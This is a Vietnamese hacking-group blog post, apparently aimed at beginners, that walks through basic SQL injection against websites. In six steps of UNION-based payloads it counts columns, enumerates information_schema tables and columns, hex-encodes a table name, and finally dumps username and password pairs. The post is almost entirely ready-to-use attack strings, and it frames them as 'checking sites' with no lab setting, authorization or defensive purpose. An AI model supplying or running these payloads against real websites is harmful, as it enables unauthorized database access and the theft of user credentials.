Joker Blog
Nguyễn Anh Pha
Bài 1: Training For Newbie các bước CHECK Site lỗi SQL
- SQL Basic
- -------------------------------------------------------------
- Khai thác lỗi SQL cơ bản:
- Bước 1: ORDER BY 100-- -
- Bước 2: UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -
- Bước 3: UNION SELECT 1,2,3,group_concat(TABLE_NAME),5,6,7,8,9 FROM information_schema.TABLES where table_schema=database()-- -
- Các bạn lưu ý là những con số trên là con số mình ví dụ ko phải là con số thực ở các Website vì vậy hãy luôn linh hoạt trong việc check site
- Bước 4: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9 FROM information_schema.COLUMNS WHERE table_schema=DATABASE()--
- Bước 5: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,,8,9 FROM information_schema.COLUMNS WHERE table_schema=DATABASE() AND TABLE_NAME=0x... -- -
VD: User = 0xuser
Mã hóa "user" sang HEX: User = 75736572
Chú ý: ở chổ "..." là TABLE mà được mã hóa sang mã hex
=>>VD get được username và password
Ta thay thế "username và password" vào chổ Column_name để lấy hẳn thông tin chính xác cụ thể
- Bước 6: UNION SELECT 1,2,3,group_concat(username,0x20,password,0x20),5, 6,7,8,9 FROM TABLE_NAME
=> Đằng sau cụm FROM TABLE_NAME các bạn chú ý là chổ table_name đó là cái table mà bạn đã tìm được ở Bước số 3
Quý Huỳnh, Admin VN-Hacking Group
Copy xin để lại nguồn.
--------------------- The End Check Site SQL Basic --------------------
0 nhận xét:
Đăng nhận xét